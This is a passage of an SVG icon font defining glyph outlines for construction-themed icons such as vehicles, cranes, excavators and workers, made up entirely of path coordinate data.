<glyph glyph-name="under-construction" horiz-adv-x="1000" unicode="&#xe9ba;" d="M731 83c-22 38-44 76-66 114-14 24-20 25-43 10-7-5-15-9-17-17-6-15-16-14-27-10-4 2-9 2-12 4-13 7-24 5-35-7 18-6 35-11 53-16 13-3 7-13 10-21 2-8-5-6-8-8-15-7-29-16-34-32-6-21-13-42-29-57-2-2-2-5-3-7-5-10-3-15 10-15 57 1 113 1 170 1 11 0 23 1 33 6 10 4 14 11 12 22-3 12-8 23-14 33z m-144-34c-11 1-17 7-17 18 0 10 7 16 16 16 11 0 18-7 18-17 0-10-7-17-17-17z m43 93c-10 0-16 6-16 16-1 10 5 18 16 18 10 0 16-6 18-16-1-12-7-18-18-18z m63-55c0-10-6-17-18-17-10 1-16 7-16 18 0 11 8 16 18 16 10-1 17-7 16-17z m-397 167c17 15 35 29 52 44 4 3 7 4 13 3 7-3 15-3 25-5-6-10-11-19-16-27-4-7-5-10 5-13 19-5 38-11 57-17 7-2 11-2 14 5 10 16 20 31 34 44 2 3 4 5 2 8-6 13-12 27-20 40-3 6-10 10-18 10-32 0-65 0-97 0-10 0-18-2-24-11-14-22-29-45-43-67-5-7-2-10 3-14 5-5 8-4 13 0z m167-83c-34 27-76 33-115 46-7 2-9-1-11-6-5-13 2-28 16-36 24-12 48-24 72-36 7-3 10-7 10-15 3-34 8-67 11-100 1-11 6-11 14-11 8 0 12 0 13 10 2 37 5 74 8 105 1 29 0 28-18 43z m36 163c29 0 53 25 53 53 0 28-24 53-52 53-29 0-52-23-53-52 0-30 22-53 52-54z m-110-193c-14 7-28 14-45 23 8-31-11-49-23-70-11-18-22-36-34-53-4-7-4-11 3-15 7-4 11-9 19-1 23 26 46 51 70 76 8 9 12 19 14 31 0 4 0 7-4 9z m-82 103c58-18 115-35 174-52-8 17-19 25-35 29-37 10-74 21-111 33-13 4-20-1-28-10z m221-48c-2 3-3 6-4 9-7 14-13 29-20 44-5 9-7 25-15 25-9 1-14-15-21-23-5-6-5-11 0-17 12-15 24-31 36-46 2-3 4-8 9-4 5 4 12 5 15 12z m399-147l-359 674c-14 26-37 40-67 40s-53-14-67-40l-361-674c-14-25-14-51 1-76 15-24 38-36 66-36h720c28 0 51 12 66 36 15 25 15 51 1 76z m-43-50c-6-9-13-13-24-13h-720c-11 0-18 4-24 13-5 10-5 17 0 26l0 1 361 673 0 1c6 10 13 14 24 14s18-4 23-15l360-673 0-1c5-9 5-16 0-26z" />
<glyph glyph-name="vehicle-cement" horiz-adv-x="1000" unicode="&#xe9bb;" d="M936 460c-8 34-16 68-24 102l-4 20c-5 20-10 40-14 60-3 12-10 22-25 19-13-3-16-13-13-25 3-14-6-12-14-10-87 15-173 30-260 45-13 3-23 1-34-8-19-15-101-91-142-130-11-8-14-16-9-29 18-58 35-116 53-174 1-5 1-10 7-13 4 6 2 13 2 19 1 34 0 69 1 104 0 32 27 51 58 43 22-6 32-21 33-47 0-42 0-85-1-127 0-10 3-16 12-18 2-1 3-1 4-1 24-3 48-6 72-11 14-3 24 0 35 9 70 55 140 109 210 164 7 5 13 11 17-3 3-12 10-20 23-16 15 3 16 16 13 27z m-772-271c-11 0-22 0-32 0l-18 0c-3 0-6 0-10 0h-3v0c-36-1-40-9-38-53 1-20 9-28 29-29h12c7 0 14 0 21 0l17 0c49 0 53 5 51 54-1 19-9 28-29 28z m658 62c-86 0-171 0-257 0-11 0-15-5-14-15 0-12 0-23 0-35-2-27-21-44-48-43-26 0-43 18-44 44 0 10 0 21 1 31 0 13-4 20-18 19-11-1-22-1-33-1-27 0-27 0-27 26 0 59 0 117 0 175 0 15-4 21-20 21-44-1-88-1-131 0-11 0-19-4-25-13-45-57-90-114-135-171-6-7-9-15-8-24 0-16 0-31 0-47-1-12 3-18 16-17l64 0c30 1 57 0 62-38 7 2 9 6 11 9 23 39 57 57 101 52 43-5 72-29 86-70 4-12 10-16 22-16 42 1 84 1 125 0 14 0 21 4 26 18 15 41 46 65 89 68 46 4 83-16 100-59 10-25 23-27 46-28 6 0 6 0 10 0 10 1 16 6 16 16 0 28-1 55 0 83 0 11-4 15-15 15z m-507 49c-23 0-46 0-69 0-24 0-48-1-71 0-14 0-18 7-10 17 26 33 52 65 78 98 3 3 7 4 12 4 21 1 41 0 62 0 9 0 12-4 12-13 0-31 0-62 0-93 1-10-4-14-14-13z m-10-89c-50 0-92-42-92-92-1-50 41-92 93-91 50 0 91 41 91 91 0 51-42 92-92 92z m0-123c-19 0-33 14-32 33 0 18 15 32 34 31 17 0 31-16 31-32 0-19-15-33-33-32z m368 122c-52 0-91-39-91-91 0-52 39-92 92-92 51 1 90 40 91 92 0 52-39 91-92 91z m1-124c-17 0-33 16-34 33-1 16 15 32 32 33 17 1 34-15 34-32 1-17-15-34-32-34z m-203 122c0-26 12-38 35-38 21 0 33 12 33 37 0 76 0 152 0 228 0 25-12 37-34 37-21 1-34-12-34-36 0-38 0-76 0-114 0-38 0-76 0-114z" />
<glyph glyph-name="vehicle-crane" horiz-adv-x="1000" unicode="&#xe9bc;" d="M862 105h-379c-52 0-79-25-79-61v-74c0-38 26-58 79-58h384c39 0 61 26 61 75v52c0 36-29 66-66 66z m-99-123h-79c7 7 12 16 12 27s-5 20-12 26h79c-7-6-12-16-12-26 0-11 5-20 12-27z m-203 53h79c-7-6-12-16-12-26s5-20 12-27h-79c7 7 12 16 12 27s-5 20-12 26z m-81-53c-3 0-5 3-5 5v43c0 3 2 5 5 5h36c-7-6-12-16-12-26s5-20 12-27h-36z m379 5c0-2-2-5-5-5h-45c7 7 12 16 12 27s-5 20-12 26h45c3 0 5-2 5-5v-43z m-600 242c6 8 9 18 9 31 0 9-7 17-17 17s-18-8-18-17c0-3 0-5 0-7-1-3-6-4-8-2-4 2-8 2-12 0l-3-4c-2-1-5-1-7 0-4 3-6 8-6 16 0 15 16 19 18 20 9 1 15 8 15 17v45c0 2 2 5 5 5h10c3 0 5 1 5 4l23 112c0 3-2 6-5 6h-15c-3 0-5 2-5 5v101c0 6 7 7 9 3l200-385c0 0 0-1 0-2v-14c0-3 3-5 5-5h60c3 0 5-2 5-5v-25c0-3 2-5 5-5h253c2 0 5 2 5 5v25c0 3 2 5 5 5h94c3 0 5 2 5 5v322c0 3-2 5-5 5h-252c-3 0-5-2-5-5v-162l20-54c1-3-1-6-5-6h-27c-2 0-4 0-5 2l-361 503c-2 3-4 3-7 2l-72-44c-2-1-3-4-2-7l21-37c1-1 1-2 1-3v-219c0-3-2-5-5-5h-15c-3 0-5-3-5-6l16-112c0-3 3-4 5-4h4v-34c0-2-1-4-3-5-15-7-30-22-30-48 0-17 5-29 14-38 2-2 2-5-1-7l-80-69c-3-3-1-9 3-9h12c1 0 2 0 3 1l80 69c2 2 4 2 5 1 7-2 14-3 21-3 7 0 15 1 21 4 2 1 4 1 5 0l87-71c1-1 2-1 4-1h25l0 0-101 82c-2 2-2 4-1 7z m443 203c0 3 2 5 5 5h112c3 0 5-2 5-5v-95c0-3-2-5-5-5h-112c-3 0-5 2-5 5v95z m-170-85l34-46c2-2 1-6-1-7l-76-44c-4-2-9 2-7 7l42 89c1 4 6 4 8 1z m-42 25l-34-82c-2-4-7-4-9 0l-23 41c-2 2-1 5 1 6l58 41c4 3 9-1 7-6z m-38 84l29-40 0 0-58-38c-4-3-9 1-7 6l27 71c2 4 7 4 9 1z m-36 19l-26-70c-2-5-8-5-10-1l-20 39c-1 2 0 5 2 6l46 32c4 3 10-1 8-6z m-68 25l14 68c1 5 6 6 9 2l28-41c1-2 1-5-2-7l-42-27c-4-2-8 1-7 5z m-8 97l-14-65c-1-5-8-6-10-1l-22 41c-1 3-1 5 2 7l36 24c4 2 9-1 8-6z m-72 25l15 68c1 5 7 6 10 2l24-43c2-3 1-6-1-7l-40-26c-4-2-9 1-8 6z m-49 88l33 22c4 2 9-1 8-5l-12-63c-1-4-7-5-9-1l-22 41c-1 2 0 5 2 6z m-6-65c0 5 7 7 9 2l7-14c1-1 1-1 1-2v-154c0-3-2-5-5-5h-7c-3 0-5 2-5 5v168z m134-523h-269c-3 0-5-2-5-5v-25c0-2 2-5 5-5h25c2 0 5-2 5-5v-42c0-3-3-5-5-5h-25c-3 0-5-2-5-5v-25c0-3 2-5 5-5h269c3 0 5 2 5 5v25c0 3-2 5-5 5h-24c-3 0-5 2-5 5v42c0 3 2 5 5 5h24c3 0 5 3 5 5v25c0 3-2 5-5 5z" />
<glyph glyph-name="vehicle-delivery-van" horiz-adv-x="1000" unicode="&#xe9bd;" d="M406 371c0 74 0 148 1 222 0 13 1 27 5 40 7 22 20 32 43 32h417c13 0 23-8 23-19 1-12-8-21-22-21-17 0-33 0-50 0-14 0-22-8-22-22 0-14 8-21 23-21 28 0 55 0 83 0 5 0 10-1 15-2 9-2 16-12 16-20-1-10-9-18-20-19-3 0-6 0-10 0h-180c-16 0-24-6-25-19-1-15 7-25 23-25 42 0 85 0 127 0 11 0 22 0 33 0 14 0 24-8 24-21-1-11-10-19-24-19-15 0-31 0-46 0-16 0-25-9-25-22 0-15 9-23 25-23 24 0 49 0 73 0 15 0 25-8 25-20 0-12-11-20-26-20l-144 0c-14 0-22-8-22-21-1-15 6-22 22-22 28 0 57-1 85 0 8 0 10-3 10-10 0-34 0-68 0-102 0-45-38-83-83-84-10 0-21-2-28 2-8 4-3 16-4 25-10 71-75 120-147 113-59-5-109-51-119-109-1-8-1-15-1-23 0-6-2-8-8-8-19 0-38 1-56 0-9 0-10 3-10 11 0 50 0 101 0 151-1 26-1 51-1 76z m-32-143c-11 12-24 22-37 30-44 26-110 20-149-13-33-27-49-62-50-104 0-6-3-8-9-8-10 1-20 0-30 0-19 1-34 13-36 31-2 16 9 32 27 36 7 2 7 5 7 11 0 41 0 82 0 123 0 14 2 27 6 40 15 43 29 86 44 130 13 40 42 63 84 63 45 1 91 0 136 0 5 0 8 0 8-7 0-109 0-218 0-328 0 0 0-1-1-4z m-130 165c27 0 54 0 82 0 7 0 10 1 10 10 0 38 0 76 0 114 0 7-2 10-10 9-33 0-66 0-99 0-20 0-34-9-41-29-10-31-21-63-31-94-3-8-1-10 7-10 27 0 55 0 82 0z m132-253c0-57-47-104-104-104-56-1-104 47-104 103 0 57 48 105 104 105 57 0 103-47 104-104z m-147-1c0-24 19-42 43-43 24 0 43 19 43 44 0 24-19 42-43 42-25 0-43-17-43-43z m385-103c-55 0-104 45-104 103 0 61 48 105 105 104 55 0 103-41 103-104 1-59-48-103-104-103z m-43 104c0-25 19-43 43-44 24 0 43 19 43 44 0 24-18 43-43 42-24 0-43-18-43-42z" />
<glyph glyph-name="vehicle-dozer" horiz-adv-x="1000" unicode="&#xe9be;" d="M919 111c-26 9-39 29-39 57 0 25 0 50 0 75h0c0 26 0 52 0 78-1 31-20 53-50 58-14 2-29 1-44 2-12 0-17-6-17-18 0-66 0-132 0-198 1-38 27-69 64-76 27-6 55-2 82-3 7 0 21 1 23 9 1 8-12 13-19 16z m-565 227c-70 83-209 82-278 2-23-26-15-29 15-45 0 0 58 68 130 68 3-1 6-1 9-1l1 0c38-3 78-25 117-85 4-10 7-18 9-23 6-16 15-8 23-9 10-2 9 6 8 12-2 31-15 58-34 81z m-13-163l-26 14c-1 1-2 2-2 4 0 5 0 9 0 13 0 1 1 3 2 3 3 2 6 4 9 6 5 2 9 5 14 8 3 2 5 6 4 9-2 5-4 10-5 15-1 3-3 3-5 3-10-1-20-2-29-3-2 0-3 0-4 2-3 4-5 7-8 11-1 1-1 2-1 3 2 3 3 6 4 9 3 5 5 10 7 15 2 3 0 8-3 10l-14 10c-2 1-2 0-4-1-7-6-15-13-22-19-2-2-3-2-5-1-4 2-8 3-12 4-2 0-3 1-3 3-2 8-4 17-6 25-1 3-4 6-8 6h-13c-4 0-7-3-8-6-2-9-4-17-6-25 0-2-1-2-3-3-4-1-8-2-12-4-2-1-3 0-5 1-7 7-15 13-22 19-1 1-3 1-3 1-5-3-10-7-15-10-3-2-4-6-3-10 4-8 7-15 11-23 1-2 0-3-1-5-2-2-5-5-6-8-2-3-4-4-7-3-10 1-19 2-29 2-1 1-2 0-2-1-2-5-4-11-6-16-2-4-2-7-1-7 1-1 1-1 1-1l26-15c2-1 2-2 2-4 0-4 0-8 0-13 0-1 0-2-2-3-9-5-17-10-25-15-1 0-1 0-2-1-1 0-1-4 1-7 1-5 3-10 5-15 1-3 2-3 4-3 10 1 20 2 29 3 2 0 4 0 5-2 2-3 4-6 7-9 1-2 2-4 1-6-4-7-7-15-11-23-1-3 0-7 3-9 5-4 10-7 15-10 0-1 2 0 3 0 7 7 15 13 23 20 1 1 2 1 4 0 4-1 8-2 12-3 2-1 3-2 3-4 2-8 4-16 6-24 1-4 4-7 8-7h13c4 0 7 3 8 7 2 8 4 16 6 24 0 2 1 3 3 4 4 1 8 2 13 4 1 0 2 0 4-1 7-7 15-13 23-20 0 0 2-1 2 0 5 3 10 6 15 10 3 2 5 6 3 9-4 8-7 16-11 24 0 2 0 3 1 4 2 3 5 6 7 9 2 3 4 4 7 3 9-1 19-2 28-2 1-1 3 0 3 1 2 5 4 11 6 16 1 4 1 7 0 8 0-1-1 0-1 0z m-125-16c-23 0-41 19-40 41 0 24 20 41 44 40 22 0 40-19 40-42-1-23-20-40-44-39z m472 4c-8 4-15 8-22 12-2 1-2 2-2 3 0 4 0 8 0 12 0 1 1 2 1 3 3 1 6 3 8 4 4 3 8 5 11 7 4 2 6 6 4 10-1 4-3 8-4 12-1 2-2 3-4 2-9-1-17-1-25-2-2 0-3 0-4 2-2 3-4 6-7 9-1 1-1 2 0 3 1 3 2 5 3 8 2 4 4 8 5 12 2 3 1 8-3 10l-11 8c-1 1-2 1-3 0l-20-18c-1-1-2-1-4 0-3 1-7 2-11 3-1 1-2 1-2 3-2 7-3 13-5 20-1 4-5 7-9 7h-9c-4 0-7-3-8-7-2-7-3-13-5-20 0-2-1-2-2-3-4-1-8-2-11-3-2-1-3-1-4 0-7 6-13 12-20 18-1 0-2 0-3 0-4-3-8-5-12-8-3-2-4-7-3-11 3-6 6-12 9-19 1-1 1-3 0-4-3-2-5-5-6-7-2-3-4-4-6-3-9 1-17 2-25 2-1 0-2 0-3-1-1-4-3-9-4-13-2-4-2-7-1-8l1 0c8-5 15-9 22-13 2-1 2-2 2-3 0-4 0-8 0-12 0-1 0-2-2-3-7-4-14-8-22-13 0 0-1 0-1-1-1 0 0-3 1-7 1-4 3-8 4-12 1-2 2-3 4-2l25 2c2 0 3 0 4-2 2-3 4-5 6-8 2-2 2-3 1-5-3-6-6-12-8-19-2-3-1-8 3-10 3-3 7-6 11-8 1-1 2 0 3 0 7 6 13 12 20 17 1 1 2 2 4 1 3-1 7-2 10-3 2-1 3-2 3-4 2-6 3-13 5-20 1-3 5-7 9-7h9c4 0 7 4 8 7 2 7 3 14 5 21 0 1 1 2 3 3 3 1 7 2 11 3 1 1 2 0 3-1 7-6 14-11 20-17 1 0 2-1 3 0 4 2 8 5 12 8 3 2 4 7 3 10-3 7-6 13-9 20-1 1 0 2 1 3 2 3 4 5 6 8 1 3 3 3 6 3 8-1 16-2 25-3 0 0 2 1 2 2 1 4 3 8 4 13 2 3 2 7 1 7 0 1-1 1-1 2z m-110-15c-19 1-36 18-35 37 1 20 17 36 39 35 19 0 35-17 35-37-1-20-18-35-39-35z m122 236c-7 11-16 16-29 16-29-1-58 0-87 0-4 0-10-1-11 4 0 3 1 4 3 5h69c3 0 6 3 6 6v14c0 3-3 6-6 6h-16c-3 0-6 3-6 7v72c0 3-3 6-7 6h-32c-3 0-6-3-6-6v-53c0-4-3-7-7-7h-35c-1 2-2 3-2 5l-41 157c-1 6-7 10-12 10h-246c-5 0-11-4-12-10l-63-188-1-3c0-1 2-4 5-3 2 0 4 0 6 1 30 6 60 8 89 0 85-23 143-73 155-163v-23h29v-48h14v2c-2 7-3 15-3 23 0 63 54 114 121 114 5 0 11 0 16-1 3 0 6-1 8-1 8-1 15-3 22-7 1 0 2 0 3-1 7-3 14-6 20-11 4 7 1 16 2 24 0 6-5 6-9 6l-56 0c-3 0-8-1-8 4-1 7 5 5 9 6 19 0 39-2 59 0 14 1 21-6 30-17 24-33 33-68 31-108-4-41-1-40 39-40 10 0 14 2 14 13-1 30-1 60 0 90 0 8-3 15-7 21-16 26-32 52-48 78z m-348 140l-1-53c0-11-5-17-17-17-35-1-70-2-105-2-18 0-21 5-15 21 12 35 26 70 38 105 4 13 12 18 25 17l54 0c16 0 21-5 21-20-1-17 0-34 0-51z m124-70c-14 0-28 0-42 0h-42c-10 0-17 3-17 15 2 37-2 74 0 111 1 11 5 16 17 15 17 0 35 0 52 0 12 1 19-5 21-16 9-36 17-72 25-107 3-12 0-19-14-18z" />
<glyph glyph-name="vehicle-excavator" horiz-adv-x="1000" unicode="&#xe9bf;" d="M937 432c0 18 0 19-18 18-20-3-28 5-37 23-51 103-104 205-156 308-3 6-5 7-11 3-14-10-28-20-43-30-6-4-6-7-4-13 5-13 9-27 14-40 3-7 2-11-6-15-92-49-185-98-276-149-20-10-35-14-53 1-4 3-8 4-13 1-14-8-29-16-43-24-5-2-6-5-4-10l12-35c1-5 1-10-1-15-25-59-49-117-73-175-3-7-7-10-14-10-31 1-61 1-91 1-27-1-44-17-44-44 0-35 0-69 0-103 1-25 12-37 37-37 34 0 68 0 102 0 4 0 8 1 11-2-16-16-19-36-14-57 5-19 16-29 36-29l138 0c35 0 54 26 47 59-3 11-10 19-17 28 4 2 9 1 13 1l136 0c24 0 33 9 32 33 0 47 0 93 1 140 0 7-2 12-5 17-20 30-39 60-58 90-4 5-7 7-14 7-41 0-81 0-122 0-10 0-13-2-13-12 1-29 0-58 1-86 0-11-4-14-14-13-26 0-51 0-77 0-3 0-7-1-10 1 1 2 1 3 1 4 34 64 68 129 102 194 2 5 5 6 10 7 106 31 212 62 318 92 6 2 10 1 14-5 26-37 52-73 78-110 11-16 26-30 31-48 6-18 2-39 2-58 0-3 0-5 0-7 2-10-1-17-8-24-8-9-14-18-21-27-1 0-1-1-1-1l6-14c12 17 31 42 31 42v-5l-30-40 6-15 40 47 3-2-42-48 12-27c32 32 63 65 95 98 4 3 5 7 5 13-1 34-1 68-1 102z m-519-100c0 7 2 9 9 9 26 0 52 0 78 0 5 0 9-2 12-7 16-26 32-53 48-79 6-9 3-19 3-29 0-4-6-2-9-2-22-1-44-1-65-1-23 0-45 1-67 0-7 0-9 2-9 8 1 34 1 68 0 101z m203-309c-60 1-120 0-180 1-4 0-7-1-9-6-9-17-24-23-43-23-48 0-96 0-145-1-17 0-29 8-35 23-3 5-5 7-10 7-29-1-58 0-88-1-34-1-51-24-48-50 0-4 0-8 0-12 0-29 19-48 47-48h254v0h255c26 0 45 16 48 42 1 10 1 19-1 28-5 26-20 40-45 40z" />
<glyph glyph-name="vehicle-trucktor" horiz-adv-x="1000" unicode="&#xe9c0;" d="M907 422c-10 2-20 3-31 3-17 0-34 0-51 0-6 0-14-1-14 8-1 13-5 29 1 38 17 25 7 52 10 78 1 17-8 23-24 22-5 0-10 0-14 0-20 2-27-8-26-26 3-25 0-49 10-75 10-27 3-60 1-91 0-8-7-13-16-13-9 0-16 5-18 14-1 9-1 18-1 26 2 15-3 20-18 19-22-1-45 0-68 0-10-1-14 2-14 13 0 84 0 168 0 252 0 7 1 12 10 14 20 3 16 19 15 32-1 14-11 16-22 16-137 0-275 0-412 0-12 0-22-2-23-17 0-14-3-29 17-31 10-1 10-6 9-14-9-79-18-158-27-237-2-14-1-22 16-22 49 0 98-1 148 1 48 2 95 2 125-45 3-4 8-7 12-11 6-7 18-11 5-24-13-13-17-1-22 5-29 35-62 60-111 48 0 0-1 0-2 0-67 0-134 0-201 0-7 0-12-3-16-7-22-27-50-49-74-74-2-3-7-5-6-10 3-10 34-28 47-26 18 4 7 18 8 27 3 37 26 52 61 37 4-2 9-3 12-6 11-9 15-6 21 6 19 41 53 47 77 11 14-21 24-18 42-10 34 14 55 0 58-37 1-4 1-7 0-11-1-13 1-20 17-16 4 1 8 0 12-1 37-5 53-30 34-62-12-20-9-28 10-38 17-9 29-24 22-46-3-9 1-11 9-11 25 0 51-2 71 20 6 6 8 8 4 16-19 36-7 57 33 62 9 1 13 2 15 13 5 44 22 53 64 35 7-3 10-3 14 4 26 37 47 37 73 1 5-7 8-9 16-5 40 19 58 8 64-36 0-4-2-9 3-11 6-1 8 3 9 7 13 28 26 55 40 86-20 0-38 0-55 0-13 0-23 3-24 17 0 16 10 20 23 20 21 0 42 1 62 0 11-1 15 4 18 13 8 24-3 44-28 49z m-506 39c-47 0-94-1-141-2-13 0-18 4-17 18 6 56 10 113 16 169 2 28 11 35 39 35 26 1 53 1 79 0 30 0 39-9 39-40 0-26 0-52 0-78 0-29 0-57 1-85 0-11-2-17-16-17z m200 1c0-25-7-32-33-33-18 0-37 0-55 1-40 0-57 16-57 56l1 140c0 27 6 33 32 33 28 0 55 0 83 0 21-1 29-9 29-30 1-28 0-57 0-85 0-27 1-54 0-82z m-154-288c-18 5-23 19-22 34 1 9 9 17 14 25 11 21 7 28-17 29-3 0-6 0-8 0-30-1-40 8-39 38-1 9 5 21-6 28-11 6-20-4-30-8-1 0-2-1-4-2-22-13-38-8-49 16-4 10-7 22-19 22-13 1-17-12-22-21-15-28-27-32-53-15-8 5-16 13-26 8-11-5-8-16-8-26-1-35-7-41-43-40-9 0-21 2-26-8s3-18 7-26c1-2 3-5 5-7 12-18 6-36-13-46-10-5-25-8-25-22-1-15 15-17 25-23 1-1 2-1 3-2 16-8 21-28 11-43-4-7-9-13-13-21-6-12 0-18 12-20 6-1 12-1 18-1 30 1 38-8 38-38 0-11-4-24 8-30 10-5 19 4 28 9 25 16 39 12 52-14 5-9 9-21 20-21 14-1 17 13 22 22 13 25 28 29 52 13 3-2 7-4 10-6 17-8 24-4 26 14 0 4 0 8 0 12-1 32 7 40 39 39 10 0 22-3 28 7 8 11-3 21-8 30-15 24-12 38 14 51 9 5 22 9 22 22 0 12-13 18-23 21z m-181-106c-45 0-83 38-84 84 0 45 37 84 83 85 46 0 85-38 85-84 0-45-39-85-84-85z m626 63c-22 12-24 21-11 44 1 2 2 5 4 7 8 14 2 20-12 22-4 0-9 0-13-1-20 0-28 8-28 28 0 9 4 21-6 27-10 5-18-4-25-8-18-11-30-8-40 11-2 4-4 7-6 11-8 12-16 12-23 0-3-4-5-8-7-13-9-16-23-20-39-9-8 5-16 13-26 7-9-5-5-16-5-24 0-23-7-31-30-30-9 1-21 4-26-7-4-8 3-16 8-23 12-17 8-31-10-40-8-5-20-7-19-19 0-11 11-13 20-18 17-9 20-23 9-40-4-7-13-15-8-24 5-10 17-6 26-6 22 0 30-8 29-31 0-17 1-22 6-24 10-5 17 2 24 7 19 12 31 8 42-12 4-8 7-18 18-17 10 0 12 10 16 17 12 21 22 24 42 12 8-5 15-13 24-7 10 5 6 16 6 24 0 23 7 31 32 31 8 0 17-3 22 5 6 9-1 17-6 24-12 20-9 31 12 42 7 4 18 7 18 18-1 9-11 12-18 16z m-148-84c-38 0-68 29-68 67-1 38 29 68 67 69 36 0 68-31 69-68 0-37-31-68-68-68z m25 546c2 1 3-1 4-2 8-7 17-9 26-5 9 4 14 14 12 24 0 3 0 4 3 5 10 3 15 10 14 21 0 2 0 3 1 4 4 4 6 8 7 13 0 1-1 3 1 3 1 0 2 0 3 0 8 0 14 6 14 14s-6 14-14 14c-7 0-13-6-14-13-1 0-2 0-3 1-11 3-19-1-23-13-1-2-2-3-5-2-10 4-21-1-24-12-1-2-1-5-1-8-11 1-19-1-25-10-5-8-5-16 0-24 5-9 14-12 24-10z" />
<glyph glyph-name="vehicle-wrecking" horiz-adv-x="1000" unicode="&#xe9c1;" d="M196 293c2 19 3 37 4 56h19c8 41 16 81 24 122h-25v125c2-4 3-5 4-7 64-123 128-247 192-370 7-14 15-26 13-42 0-1 0-1 1-3h68v-34h262v35h104v330h-260c-1-3-1-6-1-8 0-50 0-99 0-148 0-7 2-14 4-20 6-16 12-33 18-50-11 0-20 0-29 0-6-1-10 1-13 6-17 24-34 48-51 72-103 143-206 287-309 430h-2c-3-1-5-3-7-5-24-14-48-28-72-43 7-12 14-24 21-36 2-4 3-9 3-13 1-69 1-138 1-207v-12h-26c6-41 12-81 17-122 3 0 6-1 9-1v-54c-41-9-67-44-62-85 4-34 34-63 68-66 37-2 70 20 80 55 5 17 4 34-3 51-10 23-28 37-52 44z m475 142h122v-103h-122v103z m-133-139c-30-18-60-35-90-52l-2 1c16 36 33 71 50 108 14-19 28-38 42-57z m-73 89c-15-34-29-69-44-105-11 19-20 36-31 54 25 17 49 35 73 52l2-1z m-15 30c-23-15-46-30-68-45-1 1-1 1-2 1 12 30 23 60 36 91 12-16 23-31 34-47z m-60 72c-12-31-23-61-35-94-10 19-18 35-27 53 20 14 40 28 60 42 1-1 1-1 2-1z m-57 92c13-19 25-37 38-55-19-12-37-24-57-36 7 31 13 59 19 91z m-41-61c-11 20-21 38-31 57 16 11 33 21 51 33-7-31-13-60-20-90z m-36 183c11-20 22-39 33-58-17-11-35-22-54-35 7 32 14 62 21 93z m-24 36c-6-30-11-58-17-88-11 20-21 39-30 57 15 10 30 20 47 31z m-49-78c8-14 18-26 17-44-1-43 0-86 0-129v-14h-17v187z m713-603c-2 26-19 42-44 47-6 1-13 1-19 1-119 0-237 0-356 0-16 0-33 0-49-2-36-6-53-27-54-63 0-23 0-46 0-70 0-27 13-44 39-51 7-2 14-4 21-6h414c30 7 46 28 48 58 2 28 2 57 0 86z m-69-73h-383v51h383v-51z" />
<glyph glyph-name="worker" horiz-adv-x="1000" unicode="&#xe9c2;" d="M918-8c-29 74-57 148-85 223-3 7-8 12-14 16-41 22-83 39-127 51-29 8-39 2-56-23-17-28-37-54-52-82-15-28-33-43-66-37-13 2-20 4-27 15-24 39-49 76-73 114-6 10-13 15-25 15-39 0-71-19-106-31-19-8-39-16-58-32 21-7 34-20 36-41 2-16 14-26 19-40 2-6 7-6 12-5 22 7 41 1 60-10 90-54 180-108 271-161 11-7 21-16 26-29 3-7 7-8 14-7 82 9 163 22 242 46 10 3 13 7 9 18z m-573 514c17 1 36 5 50-1 40-20 82-21 125-22 42-1 84-2 124 13 18 6 35 11 54 11 42-1 45 4 39 46l0 2c-1 6-4 11-11 11-11-1-11 5-12 13-4 58-28 108-71 147-16 14-39 21-46 44-1 3-6 8-11 5-4-2-2-6-3-10-2-30-5-61-7-91-1-11-3-22-16-22-15 0-14 13-14 24 1 31 2 62 4 94 1 19-11 14-22 15-11 1-18 0-18-15 2-34 2-68 3-102 0-8-2-15-12-16-9-1-15 5-15 15l-4 43c-2 22-4 44-6 68-15-9-15-9-20-20-2-5-5-9-10-12-63-38-94-96-99-167-1-8-2-14-11-13-9 0-12-6-12-14 0-8 0-16 0-24-2-16 4-23 21-22z m237 47c7 52 13 103 20 158 50-36 71-82 76-137 0-9-4-12-12-14-24-8-49-12-75-14-6-1-9 0-9 7z m-123 155c6-51 13-102 19-152 1-9-1-11-10-10-24 3-48 6-71 13-6 2-12 3-13 11-3 43 30 118 75 138z m153-778c-2 2-5 3-8 5-84 51-167 104-253 152-40 23-46 21-65-21-6-13-6-19 10-23 36-10 71-22 106-33 6-2 16-4 14-12-3-11-12-6-19-4-38 12-75 24-113 34-17 5-25 16-27 32-2 9-1 18-1 28 1 18-1 35-12 50-8 11-17 20-15 36 2 8-7 10-14 13l-83 29c-34 12-41 8-50-27-2-8-2-15-3-23-1-12 5-18 17-20 31-6 63-13 95-19 11-2 22-8 30 6 5 7 9-1 11-5 10-12 11-27 10-43-3-23 0-45 17-63 5-6 4-10 1-16-9-19-17-38-26-57-6-13-3-21 9-28 14-7 28-10 43-10h155v-1h120c15 0 30 0 45 0 5 0 11 0 13 6 2 6-2 11-7 14z m-525 254c6 30 12 36 31 31-17-3-22-16-31-31z m276 298c-11-1-30 10-31-14-1-27 7-51 28-67 11-8 17-17 21-29 27-69 85-112 150-111 15 0 29 1 43 6 54 19 87 59 107 111 3 7 4 14 13 19 22 13 31 33 34 58 3 24-1 27-25 28-11 0-17 0-15-16 3-16 3-34-22-37-9-1-13-10-15-19-4-17-11-32-19-47-33-58-95-81-150-53-40 20-61 55-71 97-3 9-5 21-16 22-24 2-24 19-24 36 1 7 8 19-8 16z m-158-405c0 8-3 12-11 12-6 0-13 5-17-5-11-32-23-64-35-95-2-6-3-10 4-12 15-5 30-9 41-13 16-1 37 40 31 53-9 19-14 39-13 60z" />
<glyph glyph-name="workers-group" horiz-adv-x="1000" unicode="&#xe9c3;" d="M641 168c-2 8-5 13-12 18-34 23-73 37-112 49-8 3-13 1-19-6-43-52-97-77-166-66-46 8-82 33-111 69-3 4-5 9-11 7-43-13-86-28-124-53-6-5-10-10-11-18-3-16-7-32-11-47-3-11-1-14 10-16 101-20 202-28 321-27 29 1 74 3 119 8 44 4 88 11 131 19 8 2 10 5 8 13-5 16-9 33-12 50z m-419 240c13 1 28 4 38-1 31-15 63-16 95-17 33 0 65-1 96 10 13 5 26 9 41 9 32-1 35 3 30 35l0 2c-1 4-3 8-8 8-9-1-9 4-9 10-4 45-22 83-55 113-12 11-29 16-35 34-1 2-5 5-8 4-4-2-2-5-3-8-2-23-4-47-5-70-1-9-3-17-12-17-12 0-11 10-11 18 1 24 1 48 3 72 1 15-9 11-17 12-8 1-14 0-13-12 1-26 1-52 2-78 0-6-2-11-9-12-8 0-12 4-12 11-2 11-2 22-3 33-2 17-3 34-5 52-11-6-11-6-15-15-2-4-4-7-8-9-48-29-72-73-76-128-1-6-1-10-8-10-7 0-10-4-9-10 0-6 0-13-1-19-1-12 4-17 17-17z m197 157c37-28 54-62 57-105 1-7-3-9-8-11-19-5-38-9-58-10-5-1-7 0-6 5 4 40 9 79 15 121z 